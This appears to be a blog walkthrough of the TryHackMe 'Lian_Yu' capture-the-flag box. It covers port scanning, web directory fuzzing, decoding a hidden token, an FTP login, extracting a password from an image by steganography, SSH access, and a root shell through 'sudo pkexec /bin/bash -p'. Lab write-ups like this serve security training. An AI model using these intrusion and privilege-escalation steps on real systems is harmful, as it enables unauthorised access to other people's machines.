THM: Lian_Yu
Intro⌗
Lian_Yu is a beginner friendly CTF mostly focused on enumeration. We’ll fuzz a website to find credentials that will get us access to the FTP service. There we’ll find an image file to perform steganalysis on, and that will reveal a password we can use to SSH into the box. Escalating to root from there is just a matter of escaping from a binary we have sudo privileges for.
Recon⌗
rustscan -a 10.10.122.151 -- -sC -sV -oA nmap1
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.2
22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAOZ67Cx0AtDwHfVa7iZw6O6htGa3GHwfRFSIUYW64PLpGRAdQ734COrod9T+pyjAdKscqLbUAM7xhSFpHFFGM7NuOwV+d35X8CTUM882eJX+t3vhEg9d7ckCzNuPnQSpeUpLuistGpaP0HqWTYjEncvDC0XMYByf7gbqWWU2pe9HAAAAFQDWZIJ944u1Lf3PqYCVsW48Gm9qCQAAAIBfWJeKF4FWRqZzPzquCMl6Zs/y8od6NhVfJyWfi8APYVzR0FR05YCdS2OY4C54/tI5s6i4Tfpah2k+fnkLzX74fONcAEqseZDOffn5bxS+nJtCWpahpMdkDzz692P6ffDjlSDLNAPn0mrJuUxBFw52Rv+hNBPR7SKclKOiZ86HnQAAAIAfWtiPHue0Q0J7pZbLeO8wZ9XNoxgSEPSNeTNixRorlfZBdclDDJcNfYkLXyvQEKq08S1rZ6eTqeWOD4zGLq9i1A+HxIfuxwoYp0zPodj3Hz0WwsIB2UzpyO4O0HiU6rvQbWnKmUaH2HbGtqJhYuPr76XxZtwK4qAeFKwyo87kzg==
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRbgwcqyXJ24ulmT32kAKmPww+oXR6ZxoLeKrtdmyoRfhPTpCXdocoj0SqjsETI8H0pR0OVDQDMP6lnrL8zj2u1yFdp5/bDtgOnzfd+70Rul+G7Ch0uzextmZh7756/VrqKn+rdEVWTqqRkoUmI0T4eWxrOdN2vzERcvobqKP7BDUm/YiietIEK4VmRM84k9ebCyP67d7PSRCGVHS218Z56Z+EfuCAfvMe0hxtrbHlb+VYr1ACjUmGIPHyNeDf2430rgu5KdoeVrykrbn8J64c5wRZST7IHWoygv5j9ini+VzDhXal1H7l/HkQJKw9NSUJXOtLjWKlU4l+/xEkXPxZ
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPfrP3xY5XGfIk2+e/xpHMTfLRyEjlDPMbA5FLuasDzVbI91sFHWxwY6fRD53n1eRITPYS1J6cBf+QRtxvjnqRg=
| 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDexCVa97Otgeg9fCD4RSvrNyB8JhRKfzBrzUMe3E/Fn
80/tcp open http syn-ack Apache httpd
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34586/tcp status
| 100024 1 42805/tcp6 status
| 100024 1 57365/udp status
|_ 100024 1 60425/udp6 status
34586/tcp open status syn-ack 1 (RPC #100024)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration⌗
We can start by checking out the website on port 80. It’s just a single page introducing the theme of the box, but knowledge of Arrowverse isn’t required for the challenge.
Since there isn’t much to go on we can start fuzzing for more content.
ffuf -t 80 -u http://10.10.122.151/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
island [Status: 301, Size: 236, Words: 14, Lines: 8]
Not much here either, but we did find an /island directory.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/LianYu]
└─$ curl -i http://10.10.122.151/island/
HTTP/1.1 200 OK
Date: Fri, 04 Jun 2021 13:03:05 GMT
Server: Apache
Last-Modified: Tue, 05 May 2020 15:28:54 GMT
ETag: "159-5a4e84e26c1a0"
Accept-Ranges: bytes
Content-Length: 345
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html>
<html>
<body>
<style>
</style>
<h1> Ohhh Noo, Don't Talk............... </h1>
<p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! -->
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>
</body>
</html>
With this hint we can start a wordlist, as vigilante could be a username somewhere. Let’s fuzz this directory as well.
ffuf -t 80 -u http://10.10.122.151/island/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-mediumtxt
2100 [Status: 301, Size: 241, Words: 14, Lines: 8]
Another hidden directory to explore.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/LianYu]
└─$ curl -i http://10.10.122.151/island/2100/
HTTP/1.1 200 OK
Date: Fri, 04 Jun 2021 13:08:49 GMT
Server: Apache
Last-Modified: Tue, 05 May 2020 15:06:21 GMT
ETag: "124-5a4e7fd8c8a40"
Accept-Ranges: bytes
Content-Length: 292
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html>
<html>
<body>
<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>
<p ali4gn=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how? -->
</header>
</body>
</html>
We’re given another hint here. Let’s fuzz the /2100 directory next, but this time with -e .ticket to look for files with that extension.
green_arrow.ticket [Status: 200, Size: 71, Words: 10, Lines: 7]
Now we’re getting somewhere!
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/LianYu]
└─$ curl -i http://10.10.122.151/island/2100/green_arrow.ticket
HTTP/1.1 200 OK
Date: Fri, 04 Jun 2021 13:13:13 GMT
Server: Apache
Last-Modified: Tue, 05 May 2020 14:56:31 GMT
ETag: "47-5a4e7da59cc40"
Accept-Ranges: bytes
Content-Length: 71
This is just a token to get into Queen's Gambit(Ship)
RTy[REDACTED]scX
We have some encoded text, but it’s not base64. We can use CyberChef to iterate through different encoding formats until we find one that works. In this case it is base58, and the decoded value looks like it could be a password.
Now let’s test these creds, assuming vigilante is a username and this is their password.
It doesn’t work for SSH, but it does get us into the FTP service.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/LianYu]
└─$ ftp -v 10.10.122.151
Connected to 10.10.122.151.
220 (vsFTPd 3.0.2)
Name (10.10.122.151:brian): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 511720 May 01 2020 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 2020 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 2020 aa.jpg
226 Directory send OK.
There are 3 image files we can download for further analysis locally, but if we cd .. we’ll also learn there is another user, slade, on the box.
ftp> cd ..
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwx------ 2 1000 1000 4096 May 01 2020 slade
drwxr-xr-x 2 1001 1001 4096 May 05 2020 vigilante
When you find images file like this in a CTF it’s always a good idea to assume there may be some steganography involved.
With stegseek -sf aa.jpg we can extract a hidden zip file embedded inside aa.jpg.
[i] --> Found passphrase: "REDACTED"
[i] Original filename: "ss.zip"
[i] Extracting to "aa.jpg.out"
Unzipping that file gives us a text file shado that contains a possible password.
Initial Foothold⌗
We can try to SSH into the 2 accounts we know about using the password we just found, and with that we’ll be able to get a shell as slade and grab the user flag.
┌──(brian㉿kali)-[~/…/hacks/tryhackme/LianYu]
└─$ ssh slade@10.10.122.151
slade@10.10.122.151's password:
Way To SSH...
Loading.........Done..
Connecting To Lian_Yu Happy Hacking
██╗ ██╗███████╗██╗ ██████╗ ██████╗ ███╗ ███╗███████╗██████╗
██║ ██║██╔════╝██║ ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗
██║ █╗ ██║█████╗ ██║ ██║ ██║ ██║██╔████╔██║█████╗ █████╔╝
██║███╗██║██╔══╝ ██║ ██║ ██║ ██║██║╚██╔╝██║██╔══╝ ██╔═══╝
╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗
╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝
██╗ ██╗ █████╗ ███╗ ██╗ ██╗ ██╗██╗ ██╗
██║ ██║██╔══██╗████╗ ██║ ╚██╗ ██╔╝██║ ██║
██║ ██║███████║██╔██╗ ██║ ╚████╔╝ ██║ ██║
██║ ██║██╔══██║██║╚██╗██║ ╚██╔╝ ██║ ██║
███████╗██║██║ ██║██║ ╚████║███████╗██║ ╚██████╔╝
╚══════╝╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═════╝ #
slade@LianYu:~$ ls -l
total 4
-r-------- 1 slade slade 63 May 1 2020 user.txt
slade@LianYu:~$ wc -c user.txt
63 user.txt
Privilege Escalation⌗
If we check for sudo permissions we’ll see slade can run /usr/bin/pkexec as root without a password, and we can use that to escalate to a root shell!
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
slade@LianYu:~$ sudo pkexec /bin/bash -p
root@LianYu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LianYu:~# cd /root
root@LianYu:~# ls -l
total 4
-rw-r--r-- 1 root root 340 May 1 2020 root.txt
root@LianYu:~# wc -c root.txt
340 root.txt